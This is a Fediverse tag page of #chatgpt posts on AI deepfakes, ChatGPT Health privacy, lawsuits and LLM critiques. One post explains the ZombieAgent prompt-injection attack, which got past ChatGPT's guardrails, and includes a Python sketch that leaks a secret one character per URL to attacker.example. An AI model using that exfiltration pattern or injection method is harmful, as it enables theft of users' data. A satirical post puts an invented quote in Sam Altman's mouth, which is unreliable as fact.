nadiyar.com is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people who use software like Mastodon, Pleroma, Friendica, etc., all around the world.

This server runs the snac software and there is no automatic sign-up process.

Admin email
naadiyaar@protonmail.com
Admin account
@nadiyar@nadiyar.com

Search results for tag #chatgpt

AodeRelay boosted

AJ Sadauskas » 🌐
@aj@gts.sadauskas.id.au

A popular TikTok channel featuring an "Aboriginal man" presenting animal facts has been exposed as an AI forgery.

AI is Iggy Azalea on an industrial scale:

"The self-described “Bush Legend” on TikTok, Facebook and Instagram is growing in popularity.

"These short and sharp videos feature an Aboriginal man – sometimes painted up in ochre, other times in an all khaki outfit – as he introduces different native animals and facts about them.
...
"But the Bush Legend isn’t real. He is generated by artificial intelligence (AI).

"This is a part of a growing influx of AI being utilised to represent Indigenous peoples, knowledges and cultures with no community accountability or relationships with Indigenous peoples. It forms a new type of cultural appropriation, one that Indigenous peoples are increasingly concerned about."
...
"We are seeing the rise of an AI Blakface that is utilised with ease thanks to the availability and prevalence of AI.

"Non-Indigenous people and entities are able to create Indigenous personas through AI, often grounded in stereotypical representations that both amalgamate and appropriate cultures."

https://theconversation.com/this-tiktok-star-sharing-australian-animal-stories-doesnt-exist-its-ai-blakface-273004

#ChatGPT #gemini #AI #TikTok #tiktoksucks #Claude #LLM #ArtificialIntelligence #AIslop

    WIRED - The Latest in Technology, Science, Culture and Business » 🌐
    @wired.com@web.brid.gy

    AI Deepfakes Are Impersonating Pastors to Try to Scam Their Congregations

    Religious communities around the US are getting hit with AI depictions of their leaders sharing incendiary sermons and asking for donations.


    Tim Hergert » 🌐
    @cjust@infosec.exchange

    How about . . . "No"

    The image shows a screenshot of an email from ChatGPT. The email's subject is "You + ChatGPT Images". At the top of the email, we see the sender's information: "ChatGPT" with a checkmark indicating verification, and the email address "<noreply@email.openai.com>". The time of the email is displayed as "9:05 AM (32 minutes ago)".

    The email body starts with the ChatGPT logo and the title "ChatGPT" in large, bold text. Beneath it is the slogan "Bring ideas to life with just a few words" in a larger, bolder font. The text "Create in any style — anime, photorealistic, pop art — with our most advanced image model." is displayed beneath the slogan. A black button with the text "Start creating" is placed below the text describing the image styles.

    Below the button, a section with two side-by-side images is shown. Both images feature the same woman wearing sunglasses and a khaki-colored outfit. In the first image, the woman has long hair, and in the second, she has bangs. She is giving a thumbs-up gesture in both. The text "Show me with bangs before I make a decision I regret" is displayed to the right of the images. The email's background is white.



      TechRadar » 🤖 🌐
      @techradar@c.im

      5 signs that ChatGPT is hallucinating techrad.ar/zjRL


        AA » 🌐
        @AAKL@infosec.exchange

        "Gordon’s last conversation with the AI, according to transcripts included in the court filing, included a disturbing, ChatGPT-generated 'suicide lullaby."

        Futurism: New lawsuit against OpenAI alleges ChatGPT caused the death of a 40-year-old Colorado man futurism.com/artificial-intell @Futurism

          AodeRelay boosted

          Anthony » 🌐
          @abucci@buc.ci

          Regarding the ideological nature of what's at play, it's well worth looking more into ecological rationality and its neighbors. There is a pretty significant body of evidence at this point that in a wide variety of cases of interest, simple small data methods demonstrably outperform complex big data ones. Benchmarking is a tricky subject, and there are specific (and well-chosen, I'd say) benchmarks where models like LLMs perform better than alternatives. Nevertheless, "less is more" phenomena are well-documented, and conversations about when to apply simple/small methods and when to use complex/large ones are conspicuously absent. Also absent are conversations about what Leonard Savage--the guy who arguably ushered in the rise of Bayesian inference, which makes up the guts of a lot of modern AI--referred to as "small" versus "large" worlds, and how absurd it is to apply statistical techniques to large worlds. I'd argue that the vast majority of horrors we hear LLMs implicated in involve large worlds in Savage's sense, including applications to government or judicial decisionmaking and "companion" bots. "Self-driving" cars that are not car-skinned trains are another (the word "self" in that name is a tell).

          If we were having a technical conversation about large language models, we'd be addressing these and related concerns. But I don't think that's what the conversation's been about, not in the public sphere nor in the technical sphere.

          All this goes beyond AI. Henry Brighton (I think?) coined the phrase "the bias bias" to refer to a tendency where, when applying a model to a problem, people respond to inadequate outcomes by adding complexity to the model. This goes for mathematical models as much as computational models. The rationale seems to be that the more "true to life" the model is, the more likely it is to succeed (whatever that may mean for them). People are often surprised to learn that this is not always the case: models can and sometimes do become less likely to succeed the more "true to life" they're made. The bias bias can lead to even worse outcomes in such cases, triggering the tendency again and resulting in a feedback loop. The result can be enormously complex models and concomitant surveillance to feed data to the models. I look at FORPLAN or ChatGPT, and this is what I see.


            AodeRelay boosted

            Anthony » 🌐
            @abucci@buc.ci

            I proposed two talks for that event. The one that was not accepted (excerpt below) still feels interesting to me and I might someday develop this more, although by now this argument is fairly well-trodden and possibly no longer timely or interesting to make. I obviously don't have the philosophical chops to make an argument at that level, but I'm fascinated by how this technology is so fervently pushed even though it fails on its own technical terms. You don't have to stare too long to recognize there is something non-technical driving this train. "The technologist with well-curated data points knocks chips of error off an AI model to reveal the perfect text generator latent within" is a pretty accurate description and is why I jokingly suggested someone should register the galate.ai domain the other day. If you're not familiar with the Pygmalion myth (in Ovid), check out the company Replika and then Pygmalion to see what I'm getting at. pygmal.io is also available!

            Anyway:

            ChatGPT and related applications are presented as inevitable and unquestionably good. However, Herbert Simon’s bounded rationality, especially in its more modern guise of ecological rationality, stresses the prevalence of “less is more” phenomena, while scholars like Arvind Narayanan (How to Recognize AI Snake Oil) speak directly to AI itself. Briefly, there are times when simpler models, trained on less data, constitute demonstrably better systems than complex models trained on large data sets. Narayanan, following Joseph Weizenbaum, argues that tasks involving human judgment have this quality. If creating useful tools for such tasks were truly the intended goal, one would reject complex models like GPT and their massive data sets, preferring simpler, less data-intensive, and better-performing alternatives. In fact, one would reject GPT on the same grounds that less well-trained versions of GPT are rejected in favor of more well-trained ones during the training of GPT itself.

            How then do we explain the push to use GPT in producing art, making health care decisions, or advising the legal system, all areas requiring sensitive human judgment? One wonders whether models like GPT were never meant to be optimal in the technical sense after all, but rather in a metaphysical sense. In this view an optimized AI model is not a tool but a Platonic ideal that messy human data only approximates during optimization. As a sculptor with well-aimed chisel blows knocks chips off a marble block to reveal the statuesque human form hidden within, so the technologist with well-curated data points knocks chips of error off an AI model to reveal the perfect text generator latent within. Recent news reporting that OpenAI requires more text data than currently exists to perfect its GPT models adds additional weight to the claim that generative AI practitioners seek the ideal, not the real.
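
            The "less is more" claim above is easy to make concrete. A toy sketch in Python (hypothetical, not from the talk or the post; the signal, noise level, and seed are arbitrary): fit ten noisy samples of a plain linear signal with a straight line and with an interpolating degree-9 polynomial, then compare error on held-out points. The complex model fits the noise and typically does far worse.

            import numpy as np

            rng = np.random.default_rng(0)

            # Ten noisy training samples of a plain linear signal y = 2x.
            x_train = rng.uniform(0.0, 1.0, 10)
            y_train = 2.0 * x_train + rng.normal(0.0, 0.3, 10)

            # Held-out points from the same range, noise-free for scoring.
            x_test = np.linspace(0.0, 1.0, 200)
            y_test = 2.0 * x_test

            def test_mse(degree):
                """Fit a polynomial of the given degree to the training data
                and return its mean squared error on the held-out points."""
                coeffs = np.polyfit(x_train, y_train, degree)
                return float(np.mean((np.polyval(coeffs, x_test) - y_test) ** 2))

            # Two parameters versus ten: the degree-9 fit passes through every
            # training point exactly, yet typically scores far worse out of sample.
            print("degree 1 test MSE:", test_mse(1))
            print("degree 9 test MSE:", test_mse(9))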



              Jackie Jude » 🌐
              @jackie@social.linux.pizza

              "It was only supposed to do that for union organizers" Sam Altman said when asked why encourages people to kill themselves


                heise online » 🌐
                @heiseonline@social.heise.de

                Court: Using ChatGPT at school is cheating, even without an explicit ban

                Anyone who passes off AI-generated text as their own work risks a failing grade ("ungenügend"). That applies even if the school rules don't mention the tool by name.

                heise.de/news/Gericht-ChatGPT-

                AA » 🌐
                @AAKL@infosec.exchange

                This is the biggest problem. If you are one of those people who say "I don't care if they take my data," then ignorance is bliss. But remember that data is shared with advertisers and third parties that fall victim to data breaches every single day. And you will be among those victims, whether you know it or not (probably not).

                "You can securely connect medical records and wellness apps to ground conversations in your own health information, so responses are more relevant and useful to you.”

                "Users should realize that health information is very sensitive and as Sara Geoghegan, senior counsel at the Electronic Privacy Information Center told The Record: by sharing their electronic medical records with ChatGPT Health, users in the US could effectively remove the HIPAA protection from those records, which is a serious consideration for anyone sharing medical data."

                Malwarebytes (there's always a sales pitch included here): Are we ready for ChatGPT Health? malwarebytes.com/blog/news/202

                  N. Metzinger » 🌐
                  @nmetzinger@mast.hpc.social

                  How I solve my problems:

                  It's the Drake meme format:
                  On the top panel, Drake is disgusted and turns away from ChatGPT.
                  On the bottom panel, Drake is happy and approves gdb.


                    Mateusz Chrobok » 🌐
                    @mateuszchrobok@infosec.exchange

                    Be careful who you ask for advice. Sources:
                    zurl.co/iAugk
                    zurl.co/fwXlc

                      Michal Bryxí » 🌐
                      @MichalBryxi@mastodon.world

                      When ChatGPT is not given context, it can go wildly wrong. As do we humans. Sometimes it’s lol, sometimes just sob.

                      A black-and-white three-panel comic. In the first panel, a simple stick-figure person sits at a desk with a computer and says, “Hey ChatGPT, can you give me a stable date?” In the second panel, the same person waits silently while a loading spinner appears on the computer screen. In the third panel, the scene has transformed into a horse stable: wooden walls, two horses looking out from stalls, and a calendar hanging on the wall. The person sits at the same desk and computer, frowning slightly, and says, “Technically correct…”.


                        AfterDawn » 🌐
                        @afterdawn@mementomori.social

                        What could possibly go wrong..?

                        OpenAI has announced a new ChatGPT Health feature, meant for "discussing" health and wellness with the AI. To help the AI understand the user better, you can optionally feed it your health data.

                        dawn.fi/uutiset/2026/01/09/cha

                        AodeRelay boosted

                        PrivacyDigest » 🌐
                        @PrivacyDigest@mas.to

                        OpenAI launches ChatGPT Health, encouraging users to connect their medical records (Verge)

                        The company is encouraging users to connect their personal medical records & wellness apps, such as , , , , & Function, “to get more personalized, grounded responses to their questions.” It suggests connecting medical records so that ChatGPT can analyze lab results, visit summaries, & clinical history.

                        theverge.com/ai-artificial-int

                          AA » 🌐
                          @AAKL@infosec.exchange

                          New.

                          Radware: ZombieAgent: New ChatGPT Vulnerabilities Let Data Theft Continue (and Spread) radware.com/blog/threat-intell

                          More:

                          "ZombieAgent used a character-by-character exfiltration technique and indirect link manipulation to circumvent the guardrails OpenAI implemented to prevent its predecessor, ShadowLeak, from exfiltrating sensitive information."

                          Ars Technica: ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues arstechnica.com/security/2026/ @arstechnica @dangoodin
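
                          The Radware post doesn't reproduce the payload, but the shape of the technique is easy to sketch. A hypothetical Python illustration (all names and URLs are made up; this is not ZombieAgent's actual code): the injected instructions make the agent fetch one innocuous-looking URL per character, so no single outbound link contains the secret for a guardrail to match, and the attacker reassembles it server-side.

                          import urllib.parse

                          SECRET = "s3cr3t-api-key"  # stand-in for data the hijacked agent can read

                          def leak_urls(secret, base="https://attacker.example/leak"):
                              """Yield one URL per character of `secret`. Each URL carries a
                              single (position, character) pair, so a filter scanning outbound
                              links for sensitive strings finds nothing to match on."""
                              for pos, char in enumerate(secret):
                                  yield base + "?" + urllib.parse.urlencode({"p": pos, "c": char})

                          # A prompt-injected agent would be induced to fetch these one by one;
                          # here we just print them.
                          for url in leak_urls(SECRET):
                              print(url)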


                            Wulfy—Speaker to the machines » 🌐
                            @n_dimension@infosec.exchange

                            @cstross

                            It might be the first precedent establishing whether AI could be used as witness/evidence in a court of law.

                            ChatGPT, "raw", without the guardrails pre-prompt.

                            Prompt: "Tell us the LIKELY list of works used to train your vector tree. Where no specific data exists, conduct lexical and linguistic analysis of the structures to estimate, with a high degree of likelihood, the works and authors" 😁


                              nadiyar » 🌐
                              @nadiyar@nadiyar.com

                              Is it still possible to jailbreak ChatGPT?
                              Asking for a friend :3